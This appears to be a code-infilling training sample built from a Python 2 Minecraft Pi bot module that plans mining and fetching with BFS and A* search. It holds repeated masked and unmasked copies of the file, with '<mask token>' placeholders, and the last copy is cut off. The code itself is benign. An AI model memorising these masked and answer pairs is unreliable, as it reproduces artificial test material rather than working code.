pos = _Vec3(pos.x, pos.y, pos.z)
_GenericBot.__init__(self, pos)
self._pos = pos
self._move(self._pos)
@staticmethod
def destroy_all():
"""Destroy all bots within a small distance (in case I forget to
destroy one)."""
player_loc = _player_loc()
minec = _get_mc()
rad = 10
for x in xrange(player_loc.x - rad, player_loc.x + rad):
for y in xrange(player_loc.y - rad, player_loc.y + rad):
for z in xrange(player_loc.z - rad, player_loc.z + rad):
if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:
minec.setBlock(x, y, z, _AIR)
def destroy(self):
"""Set itself to air."""
self._set_block(self._pos, _AIR)
self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)
def fetch(self, block_name):
"""Mine and return a block to the player."""
imag_bot = _ImaginaryBot(self._pos, self._inventory)
block_id = getattr(block, block_name).id
block_loc = self._get_block_loc(block_id)
mine_prob = _MineProblem(imag_bot, block_loc, block_id)
mine_actions = astar(mine_prob, _mine_heuristic)
self.take_actions(mine_actions, _DELAY)
imag_bot = _ImaginaryBot(self._pos, self._inventory)
player_loc = _player_loc()
return_prob = _ReturnProblem(imag_bot, block_id, player_loc)
return_actions = astar(return_prob, _return_heuristic)
imag_bot.take_actions(return_actions)
return_actions.append({'func': '_place', 'args': ((imag_bot.get_pos() +
player_loc) / 2,), 'kwargs': {'block_': block_id}})
self.take_actions(return_actions, _DELAY)
def _get_block_loc(self, block_id):
"""Return the location of the block."""
find_prob = FindProblem(self._pos, block_id)
dirs = bfs(find_prob)
return self._pos + sum(dirs)
def _set_block(self, pos, block_):
"""Place an actual block in the world.
block is a block id."""
_get_mc().setBlock(pos, block_)
def _get_block(self, pos):
"""Get the block at the position."""
return _get_mc().getBlock(pos)
def _move(self, pos):
"""Move there, and set the appropriate blocks."""
self._set_block(self._pos, _AIR)
self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)
self._set_block(pos, self._BOT_BLOCK)
self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)
self._pos = pos
class FindProblem(SearchProblem):
"""Problem for finding the location of a block in the world.
A state in this problem is a location.
"""
def __init__(self, start_loc, block_id):
"""Initialize."""
self._start_loc = deepcopy(start_loc)
self._block_id = block_id
def getStartState(self):
"""Return the starting location."""
return self._start_loc
def isGoalState(self, state):
return _get_mc().getBlock(state) == self._block_id
def getSuccessors(self, state):
"""Return the successors."""
rtn = []
for dir_ in _all_dirs():
successor = state + dir_
if successor.y <= _get_mc().getHeight(successor.x, successor.z
) and _get_mc().getBlock(successor) != _BEDROCK:
rtn.append((successor, dir_, 1))
return rtn
class _MineProblem(SearchProblem):
"""The problem of finding the block and mining it (not returning
it)."""
def __init__(self, imag_bot, block_loc, block_id):
"""Initialize the problem with an _ImaginaryBot.
block_loc is a Vec3.
"""
self._bot = imag_bot
self._block_loc = deepcopy(block_loc)
self._block_id = block_id
def get_block_loc(self):
"""Return the block location."""
return deepcopy(self._block_loc)
def get_block_id(self):
"""Return the block it's trying to mine."""
return self._block_id
def getStartState(self):
"""Return the bot passed in."""
return self._bot
def isGoalState(self, state):
"""Return whether or not the bot has the block."""
return state.contains(self._block_id)
def getSuccessors(self, state):
"""Return the successors."""
rtn = []
for action in state.get_legal_actions():
successor = deepcopy(state)
successor.take_action(action)
rtn.append((successor, action, 1))
return rtn
class _ReturnProblem(SearchProblem):
"""The problem of returning to the player. This does not place the block
next to the player."""
def __init__(self, imag_bot, block_, player_loc):
"""Initialized the problem with an _ImaginaryBot.
block is a block id."""
self._bot = imag_bot
self._block = block_
self._player_loc = player_loc
def get_player_loc(self):
"""Return the player location."""
return deepcopy(self._player_loc)
def getStartState(self):
"""Return the bot passed in."""
return self._bot
def isGoalState(self, state):
"""Return whether or not the bot is next to the player."""
diff = state.get_pos() - self._player_loc
return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x
) + abs(diff.z) == 2 and state.get_block(self._player_loc +
diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)
def getSuccessors(self, state):
"""Return the successors."""
rtn = []
for action in state.get_legal_actions(self._block):
successor = deepcopy(state)
successor.take_action(action)
rtn.append((successor, action, 1))
return rtn
<mask token>
def _player_loc():
"""Return the player's location."""
return _to_my_vec3(_get_mc().player.getTilePos())
<mask token>
def _all_dirs():
"""Return all adjacent directions."""
return _adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]
<mask token>
def _key_vals(dict_):
"""Return a list of key-val tuples."""
return [(key, val) for key, val in dict_.iteritems()]
| <mask token>
class _Vec3(Vec3):
"""A Vec3 that is hashable. Everything in this program should use this
class."""
def __hash__(self):
"""Return the hash."""
return hash((self.x, self.y, self.z))
def clone(self):
"""Return a clone."""
return _Vec3(self.x, self.y, self.z)
class _GenericBot:
"""A generic bot."""
def __init__(self, pos, inventory=None):
"""Initialize with an empty inventory.
inventory is a dictionary. If None, an empty one will be used."""
if inventory is None:
self._inventory = {}
else:
self._inventory = deepcopy(inventory)
self._pos = deepcopy(pos)
def take_action(self, action):
"""Take the action (acquired from _get_legal_actions)."""
getattr(self, action['func'])(*action.get('args', ()), **action.get
('kwargs', {}))
def take_actions(self, actions, seconds=None):
"""Take these actions. If seconds is not None, sleep 'seconds'
seconds.
"""
if not actions:
return
self.take_action(actions[0])
for action in actions[1:]:
if seconds is not None:
sleep(seconds)
self.take_action(action)
def get_pos(self):
"""Return the position."""
return deepcopy(self._pos)
def get_legal_actions(self, block_=None):
"""Return a list of legal actions.
If block_ is None, return all legal actions. Otherwise, return all
legal actions that don't involve placing the block."""
return self._get_move_actions(block_) + self._get_mine_actions(
) + self._get_placement_actions(block_)
def contains(self, block_):
"""Return whether or not the bot contains the block id."""
return block_ in self._inventory
def _get_block(self, pos):
"""Get the block at the position."""
raise NotImplementedError
def _place(self, loc, exclude=None, block_=None):
"""Place a block from the inventory only.
If exclude is not None, place a block that is not 'exclude'.
If block is not None, place that block only.
"""
if not self._inventory:
raise Exception('Inventory empty')
if block_ is None:
for key in self._inventory:
if key != exclude:
block_ = key
break
else:
raise Exception(
'You requested not to place %s, but it is the only block in the inventory.'
% exclude)
if block_ not in self._inventory:
raise Exception('Block %s is not in the inventory' % block_)
if self._inventory[block_] == 1:
del self._inventory[block_]
else:
self._inventory[block_] -= 1
self._set_block(loc, block_)
def _move_down(self):
"""Move and mine the block below."""
new_pos = self._pos + _Vec3(0, -1, 0)
block_ = self._get_block(new_pos)
if block_ != _WATER:
self._add_to_inv(block_)
self._move(new_pos)
def _add_to_inv(self, block_):
"""Add the block to the inventory."""
if block_ in self._inventory:
self._inventory[block_] += 1
else:
self._inventory[block_] = 1
def _move_up(self, exclude=None):
"""Move and place a block below.
If exclude is not None, place a block that is not 'exclude'.
"""
self._move(self._pos + _Vec3(0, 1, 0))
self._place(self._pos + _Vec3(0, -1, 0), exclude)
def _mine(self, loc):
"""Mine the block."""
block_ = self._get_block(loc)
self._add_to_inv(block_)
self._set_block(loc, _AIR)
def _get_move_actions(self, exclude=None):
"""Return a list of legal movement actions.
exclude is the block to exclude.
"""
rtn = []
can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,
_WATER}
if can_move_up:
if self._surrounded():
rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0,
1, 0),)})
else:
rtn.append({'func': '_move_up', 'args': (exclude,)})
hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))
if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:
rtn.append({'func': '_move_down'})
for dir_ in _adj_dirs():
rtn.extend(self._side_moves(dir_, can_move_up))
return rtn
def _side_moves(self, dir_, can_move_up):
"""Return the list of side moves.
dir_ is an adjacent direction.
can_move_up is a boolean for whether or not the bot can move up.
"""
rtn = []
base_pos = self._pos + dir_
base_block = self._get_block(base_pos)
empty_blocks = {_AIR, _WATER}
if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:
for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:
if self._get_block(base_pos + vert_dir) not in empty_blocks:
break
else:
rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,
0),)})
for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:
if self._get_block(base_pos + vert_dir) not in empty_blocks:
break
else:
pos = base_pos + _Vec3(0, -1, 0)
for _ in xrange(_DROP_PLUS_1):
block_ = self._get_block(pos)
if block_ != _AIR:
if block_ != _LAVA:
rtn.append({'func': '_move', 'args': (pos + _Vec3(0,
1, 0),)})
break
pos.y -= 1
return rtn
def _surrounded(self):
"""Return whether or not the bot is surrounded by water."""
for dir_ in _adj_dirs():
if self._get_block(self._pos + dir_) != _WATER:
return False
return True
def _get_mine_actions(self):
"""Return a list of legal mining actions (that only involve mining
and not moving)."""
rtn = []
dont_mine = {_AIR, _WATER, _LAVA}
pos_above = self._pos + _Vec3(0, 2, 0)
if self._get_block(pos_above) not in dont_mine:
rtn.append({'func': '_mine', 'args': (pos_above,)})
for dir_ in _adj_dirs():
pos = self._pos + dir_
for _ in xrange(2):
if self._get_block(pos) not in dont_mine:
rtn.append({'func': '_mine', 'args': (pos,)})
pos = pos + _Vec3(0, 1, 0)
return rtn
def _get_placement_actions(self, exclude=None):
"""Return a list of legal actions that only involve placing a block
from the inventory.
exclude is a block id. It is the block that should not be placed. If None,
any block can be placed."""
if not self._has_blocks_to_place(exclude=exclude):
return []
dirs = [_Vec3(0, 2, 0)]
for dir_ in _adj_dirs():
dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])
if self._get_block(self._pos + dir_) in [_AIR, _WATER]:
dirs.append(dir_ + _Vec3(0, -1, 0))
rtn = []
for dir_ in dirs:
pos = self._pos + dir_
if self._can_place(pos):
rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {
'exclude': exclude}})
return rtn
def _can_place(self, loc):
"""Return whether or not the bot can place a block at that location
independent of what it has in its inventory."""
non_blocks = [_AIR, _WATER, _LAVA]
player = [self._pos, self._pos + _Vec3(0, 1, 0)]
for dir_ in _adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]:
new_loc = loc + dir_
if new_loc not in player and self._get_block(new_loc
) not in non_blocks:
return True
return False
def _has_blocks_to_place(self, exclude=None):
"""Return whether or not the bot can place a block from the
inventory. If exclude is None, any block can be placed."""
for block_ in self._inventory:
if block_ != exclude:
return True
return False
def _set_block(self, pos, block_):
"""Set a block. block_ is the block id."""
raise NotImplementedError
def _move(self, pos):
"""Move there only."""
self._pos = deepcopy(pos)
class _ImaginaryBot(_GenericBot):
"""A bot used for finding paths that doesn't actually change blocks
in the world."""
def __init__(self, pos, inventory=None):
"""Create a new bot."""
_GenericBot.__init__(self, pos, inventory)
self._changes = {}
def _set_block(self, pos, block_):
"""Set a block. block_ is the block id."""
self._changes[deepcopy(pos)] = block_
def _get_block(self, pos):
"""Get the block at the position."""
if pos in self._changes:
return self._changes[pos]
else:
return _get_mc().getBlock(pos)
def get_block(self, pos):
"""The public version."""
return self._get_block(pos)
def __hash__(self):
"""Return the hash."""
return hash(frozenset([self._pos] + _key_vals(self._inventory) +
_key_vals(self._changes)))
class Bot(_GenericBot):
"""The real bot.
All vector arguments are Vec3s."""
_BOT_BLOCK = block.IRON_BLOCK.id
def __init__(self):
"""Create a bot next to the player."""
pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)
pos = _Vec3(pos.x, pos.y, pos.z)
_GenericBot.__init__(self, pos)
self._pos = pos
self._move(self._pos)
@staticmethod
def destroy_all():
"""Destroy all bots within a small distance (in case I forget to
destroy one)."""
player_loc = _player_loc()
minec = _get_mc()
rad = 10
for x in xrange(player_loc.x - rad, player_loc.x + rad):
for y in xrange(player_loc.y - rad, player_loc.y + rad):
for z in xrange(player_loc.z - rad, player_loc.z + rad):
if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:
minec.setBlock(x, y, z, _AIR)
def destroy(self):
"""Set itself to air."""
self._set_block(self._pos, _AIR)
self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)
def fetch(self, block_name):
"""Mine and return a block to the player."""
imag_bot = _ImaginaryBot(self._pos, self._inventory)
block_id = getattr(block, block_name).id
block_loc = self._get_block_loc(block_id)
mine_prob = _MineProblem(imag_bot, block_loc, block_id)
mine_actions = astar(mine_prob, _mine_heuristic)
self.take_actions(mine_actions, _DELAY)
imag_bot = _ImaginaryBot(self._pos, self._inventory)
player_loc = _player_loc()
return_prob = _ReturnProblem(imag_bot, block_id, player_loc)
return_actions = astar(return_prob, _return_heuristic)
imag_bot.take_actions(return_actions)
return_actions.append({'func': '_place', 'args': ((imag_bot.get_pos() +
player_loc) / 2,), 'kwargs': {'block_': block_id}})
self.take_actions(return_actions, _DELAY)
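# fetch plans in two phases: an A* search to reach and mine the block
# (_MineProblem), then a second A* search back to the player
# (_ReturnProblem), finishing with a _place action between bot and player.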
def _get_block_loc(self, block_id):
"""Return the location of the block."""
find_prob = FindProblem(self._pos, block_id)
dirs = bfs(find_prob)
return self._pos + sum(dirs)
def _set_block(self, pos, block_):
"""Place an actual block in the world.
block is a block id."""
_get_mc().setBlock(pos, block_)
def _get_block(self, pos):
"""Get the block at the position."""
return _get_mc().getBlock(pos)
def _move(self, pos):
"""Move there, and set the appropriate blocks."""
self._set_block(self._pos, _AIR)
self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)
self._set_block(pos, self._BOT_BLOCK)
self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)
self._pos = pos
class FindProblem(SearchProblem):
"""Problem for finding the location of a block in the world.
A state in this problem is a location.
"""
def __init__(self, start_loc, block_id):
"""Initialize."""
self._start_loc = deepcopy(start_loc)
self._block_id = block_id
def getStartState(self):
"""Return the starting location."""
return self._start_loc
def isGoalState(self, state):
return _get_mc().getBlock(state) == self._block_id
def getSuccessors(self, state):
"""Return the successors."""
rtn = []
for dir_ in _all_dirs():
successor = state + dir_
if successor.y <= _get_mc().getHeight(successor.x, successor.z
) and _get_mc().getBlock(successor) != _BEDROCK:
rtn.append((successor, dir_, 1))
return rtn
class _MineProblem(SearchProblem):
"""The problem of finding the block and mining it (not returning
it)."""
def __init__(self, imag_bot, block_loc, block_id):
"""Initialize the problem with an _ImaginaryBot.
block_loc is a Vec3.
"""
self._bot = imag_bot
self._block_loc = deepcopy(block_loc)
self._block_id = block_id
def get_block_loc(self):
"""Return the block location."""
return deepcopy(self._block_loc)
def get_block_id(self):
"""Return the block it's trying to mine."""
return self._block_id
def getStartState(self):
"""Return the bot passed in."""
return self._bot
def isGoalState(self, state):
"""Return whether or not the bot has the block."""
return state.contains(self._block_id)
def getSuccessors(self, state):
"""Return the successors."""
rtn = []
for action in state.get_legal_actions():
successor = deepcopy(state)
successor.take_action(action)
rtn.append((successor, action, 1))
return rtn
class _ReturnProblem(SearchProblem):
"""The problem of returning to the player. This does not place the block
next to the player."""
def __init__(self, imag_bot, block_, player_loc):
"""Initialized the problem with an _ImaginaryBot.
block is a block id."""
self._bot = imag_bot
self._block = block_
self._player_loc = player_loc
def get_player_loc(self):
"""Return the player location."""
return deepcopy(self._player_loc)
def getStartState(self):
"""Return the bot passed in."""
return self._bot
def isGoalState(self, state):
"""Return whether or not the bot is next to the player."""
diff = state.get_pos() - self._player_loc
return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x
) + abs(diff.z) == 2 and state.get_block(self._player_loc +
diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)
def getSuccessors(self, state):
"""Return the successors."""
rtn = []
for action in state.get_legal_actions(self._block):
successor = deepcopy(state)
successor.take_action(action)
rtn.append((successor, action, 1))
return rtn
def _mine_heuristic(bot, problem):
"""Return the mining heuristic.
bot is an _ImaginaryBot.
"""
if bot.contains(problem.get_block_id()):
return 0
bot_pos = bot.get_pos()
dest_pos = problem.get_block_loc()
man_dist = _manhattan((bot_pos.x, bot_pos.z), (dest_pos.x, dest_pos.z))
y_diff = bot_pos.y - dest_pos.y
if y_diff < 0:
y_diff += 1
if y_diff == 0:
return man_dist
drop = _DROP if y_diff > 0 else 1
y_diff = abs(y_diff)
drops = _drops(y_diff, drop)
if man_dist > drops:
return man_dist
if man_dist == drops:
return man_dist + 1
if drop == 1:
return drops
if y_diff % drop == 1:
return drops
return drops + 1
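# Intuition for the heuristic above: the bot needs at least man_dist
# horizontal moves and at least 'drops' vertical moves (it can fall up to
# _DROP blocks per move but climbs only one), so the estimate is essentially
# the larger of the two, with small +1 corrections.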
<mask token>
def _return_heuristic(bot, problem):
"""Return the return heuristic.
bot is an _ImaginaryBot.
"""
bot_pos = bot.get_pos()
player_pos = problem.get_player_loc()
bot_plane_pos = bot_pos.x, bot_pos.z
y_diff = bot_pos.y - player_pos.y
drop = _DROP if y_diff > 0 else 1
y_diff = abs(y_diff)
drops = _drops(y_diff, drop)
min_man = float('inf')
for dir_ in _adj_dirs():
loc = player_pos + 2 * dir_
man_dist = _manhattan(bot_plane_pos, (loc.x, loc.z))
if man_dist < min_man:
min_man = man_dist
if man_dist < drops:
return drops
return min_man
def _to_my_vec3(vec):
"""Return the _Vec3 alternative of the Vec3."""
return _Vec3(vec.x, vec.y, vec.z)
def _player_loc():
"""Return the player's location."""
return _to_my_vec3(_get_mc().player.getTilePos())
def _adj_dirs():
"""Return the adjacent directions."""
return [_Vec3(1, 0, 0), _Vec3(-1, 0, 0), _Vec3(0, 0, 1), _Vec3(0, 0, -1)]
def _all_dirs():
"""Return all adjacent directions."""
return _adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]
<mask token>
def _key_vals(dict_):
"""Return a list of key-val tuples."""
return [(key, val) for key, val in dict_.iteritems()]
| """Module for the bot"""
from copy import deepcopy
from time import sleep
import mcpi.minecraft as minecraft
from mcpi.vec3 import Vec3
import mcpi.block as block
from search import SearchProblem, astar, bfs
from singleton import singleton
_AIR = block.AIR.id
_WATER = block.WATER.id
_LAVA = block.LAVA.id
_BEDROCK = block.BEDROCK.id
_DROP = 2 # It can drop at most this many
_DROP_PLUS_1 = _DROP + 1
_DELAY = 1
class _Vec3(Vec3):
"""A Vec3 that is hashable. Everything in this program should use this
class."""
def __hash__(self):
"""Return the hash."""
return hash((self.x, self.y, self.z))
def clone(self):
"""Return a clone."""
return _Vec3(self.x, self.y, self.z)
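# _Vec3 must be hashable because positions are used as dict keys in
# _ImaginaryBot._changes and are hashed in the bots' __hash__ methods.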
class _GenericBot:
"""A generic bot."""
def __init__(self, pos, inventory=None):
"""Initialize with an empty inventory.
inventory is a dictionary. If None, an empty one will be used."""
if inventory is None:
self._inventory = {}
else:
self._inventory = deepcopy(inventory)
self._pos = deepcopy(pos)
def take_action(self, action):
"""Take the action (acquired from _get_legal_actions)."""
getattr(self, action['func'])(
*action.get('args', ()),
**action.get('kwargs', {})
)
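# For reference, actions are plain dicts; an illustrative shape:
#     {'func': '_move', 'args': (_Vec3(1, 2, 3),)}
# 'args' and 'kwargs' may be omitted; () and {} are the defaults above.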
def take_actions(self, actions, seconds=None):
"""Take these actions. If seconds is not None, sleep 'seconds'
seconds.
"""
if not actions:
return
self.take_action(actions[0])
for action in actions[1:]:
if seconds is not None:
sleep(seconds)
self.take_action(action)
def get_pos(self):
"""Return the position."""
return deepcopy(self._pos)
def get_legal_actions(self, block_=None):
"""Return a list of legal actions.
If block_ is None, return all legal actions. Otherwise, return all
legal actions that don't involve placing the block."""
return self._get_move_actions(block_) + self._get_mine_actions() + \
self._get_placement_actions(block_)
def contains(self, block_):
"""Return whether or not the bot contains the block id."""
return block_ in self._inventory
def _get_block(self, pos):
"""Get the block at the position."""
raise NotImplementedError
def _place(self, loc, exclude=None, block_=None):
"""Place a block from the inventory only.
If exclude is not None, place a block that is not 'exclude'.
If block is not None, place that block only.
"""
if not self._inventory:
raise Exception('Inventory empty')
if block_ is None:
for key in self._inventory:
if key != exclude:
block_ = key
break
else:
raise Exception((
'You requested not to place %s, but it is the only '
'block in the inventory.' % exclude
))
if block_ not in self._inventory:
raise Exception('Block %s is not in the inventory' % block_)
if self._inventory[block_] == 1:
del self._inventory[block_]
else:
self._inventory[block_] -= 1
self._set_block(loc, block_)
def _move_down(self):
"""Move and mine the block below."""
new_pos = self._pos + _Vec3(0, -1, 0)
block_ = self._get_block(new_pos)
if block_ != _WATER:
self._add_to_inv(block_)
self._move(new_pos)
def _add_to_inv(self, block_):
"""Add the block to the inventory."""
if block_ in self._inventory:
self._inventory[block_] += 1
else:
self._inventory[block_] = 1
def _move_up(self, exclude=None):
"""Move and place a block below.
If exclude is not None, place a block that is not 'exclude'.
"""
self._move(self._pos + _Vec3(0, 1, 0))
self._place(self._pos + _Vec3(0, -1, 0), exclude)
def _mine(self, loc):
"""Mine the block."""
block_ = self._get_block(loc)
self._add_to_inv(block_)
self._set_block(loc, _AIR)
def _get_move_actions(self, exclude=None):
"""Return a list of legal movement actions.
exclude is the block to exclude.
"""
rtn = []
# Check for moving up
can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR, _WATER}
if can_move_up:
if self._surrounded():
rtn.append({
'func': '_move',
'args': (self._pos + _Vec3(0, 1, 0),)
})
else:
rtn.append({
'func': '_move_up',
'args': (exclude,)
})
# Check for moving down
hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))
if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:
rtn.append({'func': '_move_down'})
# Check for side moves
for dir_ in _adj_dirs():
rtn.extend(self._side_moves(dir_, can_move_up))
return rtn
def _side_moves(self, dir_, can_move_up):
"""Return the list of side moves.
dir_ is an adjacent direction.
can_move_up is a boolean for whether or not the bot can move up.
"""
rtn = []
base_pos = self._pos + dir_
base_block = self._get_block(base_pos)
empty_blocks = {_AIR, _WATER}
# Check if it can move up
if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:
for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:
if self._get_block(base_pos + vert_dir) not in empty_blocks:
break
else:
rtn.append({
'func': '_move',
'args': (base_pos + _Vec3(0, 1, 0),)
})
# Check if it can move in that direction
for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:
if self._get_block(base_pos + vert_dir) not in empty_blocks:
break
# Fall
else:
pos = base_pos + _Vec3(0, -1, 0)
for _ in xrange(_DROP_PLUS_1):
block_ = self._get_block(pos)
if block_ != _AIR:
if block_ != _LAVA:
rtn.append({
'func': '_move',
'args': (pos + _Vec3(0, 1, 0),)
})
break
pos.y -= 1
return rtn
def _surrounded(self):
"""Return whether or not the bot is surrounded by water."""
for dir_ in _adj_dirs():
if self._get_block(self._pos + dir_) != _WATER:
return False
return True
def _get_mine_actions(self):
"""Return a list of legal mining actions (that only involve mining
and not moving)."""
rtn = []
dont_mine = {_AIR, _WATER, _LAVA}
# Mine above.
pos_above = self._pos + _Vec3(0, 2, 0)
if self._get_block(pos_above) not in dont_mine:
rtn.append({
'func': '_mine',
'args': (pos_above,)
})
for dir_ in _adj_dirs():
pos = self._pos + dir_
for _ in xrange(2):
if self._get_block(pos) not in dont_mine:
rtn.append({
'func': '_mine',
'args': (pos,)
})
pos = pos + _Vec3(0, 1, 0)
return rtn
def _get_placement_actions(self, exclude=None):
"""Return a list of legal actions that only involve placing a block
from the inventory.
exclude is a block id. It is the block that should not be placed. If None,
any block can be placed."""
if not self._has_blocks_to_place(exclude=exclude):
return []
dirs = [_Vec3(0, 2, 0)]
for dir_ in _adj_dirs():
dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])
if self._get_block(self._pos + dir_) in [_AIR, _WATER]:
dirs.append(dir_ + _Vec3(0, -1, 0))
rtn = []
for dir_ in dirs:
pos = self._pos + dir_
if self._can_place(pos):
rtn.append({
'func': '_place',
'args': (pos,),
'kwargs': {'exclude': exclude}
})
return rtn
def _can_place(self, loc):
"""Return whether or not the bot can place a block at that location
independent of what it has in its inventory."""
non_blocks = [_AIR, _WATER, _LAVA]
player = [self._pos, self._pos + _Vec3(0, 1, 0)]
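        # The bot occupies two cells (feet and head); a block can only be
        # placed against a solid neighbour that is not part of the bot itself.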
        for dir_ in _adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]:
new_loc = loc + dir_
if new_loc not in player and self._get_block(new_loc) \
not in non_blocks:
return True
return False
def _has_blocks_to_place(self, exclude=None):
"""Return whether or not the bot can place a block from the
inventory. If exclude is None, any block can be placed."""
for block_ in self._inventory:
if block_ != exclude:
return True
return False
def _set_block(self, pos, block_):
"""Set a block. block_ is the block id."""
raise NotImplementedError
def _move(self, pos):
"""Move there only."""
self._pos = deepcopy(pos)
class _ImaginaryBot(_GenericBot):
"""A bot used for finding paths that doesn't actually change blocks
in the world."""
def __init__(self, pos, inventory=None):
"""Create a new bot."""
_GenericBot.__init__(self, pos, inventory)
self._changes = {} # Changes to the world
def _set_block(self, pos, block_):
"""Set a block. block_ is the block id."""
        self._changes[deepcopy(pos)] = block_
def _get_block(self, pos):
"""Get the block at the position."""
if pos in self._changes:
return self._changes[pos]
else:
return _get_mc().getBlock(pos)
def get_block(self, pos):
"""The public version."""
return self._get_block(pos)
def __hash__(self):
"""Return the hash."""
return hash(frozenset([self._pos] + \
_key_vals(self._inventory) + \
_key_vals(self._changes)
))
class Bot(_GenericBot):
"""The real bot.
All vector arguments are Vec3s."""
_BOT_BLOCK = block.IRON_BLOCK.id
def __init__(self):
"""Create a bot next to the player."""
pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)
pos = _Vec3(pos.x, pos.y, pos.z)
_GenericBot.__init__(self, pos)
self._pos = pos
self._move(self._pos)
@staticmethod
def destroy_all():
"""Destroy all bots within a small distance (in case I forget to
destroy one)."""
player_loc = _player_loc()
minec = _get_mc()
rad = 10
for x in xrange(player_loc.x - rad, player_loc.x + rad):
for y in xrange(player_loc.y - rad, player_loc.y + rad):
for z in xrange(player_loc.z - rad, player_loc.z + rad):
if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:
minec.setBlock(x, y, z, _AIR)
def destroy(self):
"""Set itself to air."""
self._set_block(self._pos, _AIR)
self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)
def fetch(self, block_name):
"""Mine and return a block to the player."""
imag_bot = _ImaginaryBot(self._pos, self._inventory)
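        # Phase 1: A* over an imaginary copy of the world for a sequence of
        # actions that ends with the requested block in the inventory.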
block_id = getattr(block, block_name).id
block_loc = self._get_block_loc(block_id)
mine_prob = _MineProblem(imag_bot, block_loc, block_id)
mine_actions = astar(mine_prob, _mine_heuristic)
self.take_actions(mine_actions, _DELAY)
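        # Phase 2: plan the route back and place the block next to the player.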
imag_bot = _ImaginaryBot(self._pos, self._inventory)
player_loc = _player_loc()
return_prob = _ReturnProblem(imag_bot, block_id, player_loc)
return_actions = astar(return_prob, _return_heuristic)
imag_bot.take_actions(return_actions)
return_actions.append({
'func': '_place',
            'args': ((imag_bot.get_pos() + player_loc) / 2,),
            'kwargs': {'block_': block_id}
})
self.take_actions(return_actions, _DELAY)
def _get_block_loc(self, block_id):
"""Return the location of the block."""
find_prob = FindProblem(self._pos, block_id)
dirs = bfs(find_prob)
return self._pos + sum(dirs)
def _set_block(self, pos, block_):
"""Place an actual block in the world.
block is a block id."""
_get_mc().setBlock(pos, block_)
def _get_block(self, pos):
"""Get the block at the position."""
return _get_mc().getBlock(pos)
def _move(self, pos):
"""Move there, and set the appropriate blocks."""
self._set_block(self._pos, _AIR)
self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)
self._set_block(pos, self._BOT_BLOCK)
self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)
self._pos = pos
class FindProblem(SearchProblem):
"""Problem for finding the location of a block in the world.
A state in this problem is a location.
"""
def __init__(self, start_loc, block_id):
"""Initialize."""
self._start_loc = deepcopy(start_loc)
self._block_id = block_id
def getStartState(self):
"""Return the starting location."""
return self._start_loc
def isGoalState(self, state):
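        """Return whether this location holds the sought block."""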
return _get_mc().getBlock(state) == self._block_id
def getSuccessors(self, state):
"""Return the successors."""
rtn = []
for dir_ in _all_dirs():
successor = state + dir_
if successor.y <= _get_mc().getHeight(successor.x, successor.z) \
and _get_mc().getBlock(successor) != _BEDROCK:
rtn.append((successor, dir_, 1))
return rtn
class _MineProblem(SearchProblem):
"""The problem of finding the block and mining it (not returning
it)."""
def __init__(self, imag_bot, block_loc, block_id):
"""Initialize the problem with an _ImaginaryBot.
block_loc is a Vec3.
"""
self._bot = imag_bot
self._block_loc = deepcopy(block_loc)
self._block_id = block_id
def get_block_loc(self):
"""Return the block location."""
return deepcopy(self._block_loc)
def get_block_id(self):
"""Return the block it's trying to mine."""
return self._block_id
def getStartState(self):
"""Return the bot passed in."""
return self._bot
def isGoalState(self, state):
"""Return whether or not the bot has the block."""
return state.contains(self._block_id)
def getSuccessors(self, state):
"""Return the successors."""
rtn = []
for action in state.get_legal_actions():
successor = deepcopy(state)
successor.take_action(action)
rtn.append((successor, action, 1))
return rtn
class _ReturnProblem(SearchProblem):
"""The problem of returning to the player. This does not place the block
next to the player."""
def __init__(self, imag_bot, block_, player_loc):
"""Initialized the problem with an _ImaginaryBot.
block is a block id."""
self._bot = imag_bot
self._block = block_
self._player_loc = player_loc
def get_player_loc(self):
"""Return the player location."""
return deepcopy(self._player_loc)
def getStartState(self):
"""Return the bot passed in."""
return self._bot
def isGoalState(self, state):
"""Return whether or not the bot is next to the player."""
diff = state.get_pos() - self._player_loc
return diff.y == 0 and (diff.x == 0 or diff.z == 0) and \
abs(diff.x) + abs(diff.z) == 2 and \
state.get_block(self._player_loc + diff/2 + _Vec3(0, -1, 0)) not in \
(_AIR, _LAVA, _WATER)
def getSuccessors(self, state):
"""Return the successors."""
rtn = []
for action in state.get_legal_actions(self._block):
successor = deepcopy(state)
successor.take_action(action)
rtn.append((successor, action, 1))
